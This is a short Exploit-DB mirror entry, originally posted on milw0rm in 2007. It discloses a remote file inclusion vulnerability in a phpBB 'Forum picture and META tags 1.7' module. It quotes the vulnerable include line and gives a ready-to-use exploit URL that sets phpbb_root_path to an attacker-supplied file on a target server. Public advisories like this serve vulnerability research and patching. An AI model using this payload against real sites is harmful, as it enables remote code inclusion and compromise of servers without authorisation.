exploit-db-mirror/platforms/php/webapps/3613.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

19 lines
518 B
Text
Executable file

Exploitname: phpBB Module Forum picture and META tags 1.7 File Include Vulnerability
Vendor: http://www.rfnnet.nl/downloads/phpbb/MOD_Forum_picture_and_META_tags.zip
Founder: bd0rk
Contact: bd0rk[at]hackermail.com
Greetings: str0ke, TheJT, Lu7k, CodeR
Vulnerable in MOD_forum_fields_parse.php: include($phpbb_root_path . 'MOD_forum_fields_default.php');
#$phpbb_root_path is not declared!
[+]Exploit: http://[target]/[module_path]/MOD_forum_fields_parse.php?phpbb_root_path=FILE
# milw0rm.com [2007-03-30]